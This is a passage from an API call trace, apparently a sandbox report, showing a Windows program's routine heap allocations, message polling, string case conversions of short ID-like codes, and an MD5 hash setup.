wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.478] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.478] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.479] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.479] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.479] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.479] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.479] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.479] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.479] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.479] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.480] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.480] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.480] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.480] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.480] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.480] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.480] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.481] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.481] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.481] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.481] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.481] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.481] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.482] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.482] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.482] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.483] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.483] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.484] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.484] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.484] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.485] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.485] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0255.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.486] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.486] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.486] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.486] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.487] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.487] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.487] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.487] CryptHashData (hHash=0xaa5860, pbData=0x24b1848, dwDataLen=0x3, dwFlags=0x1) returned 1 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.488] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.488] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.488] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.489] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.489] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.489] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.489] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.489] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 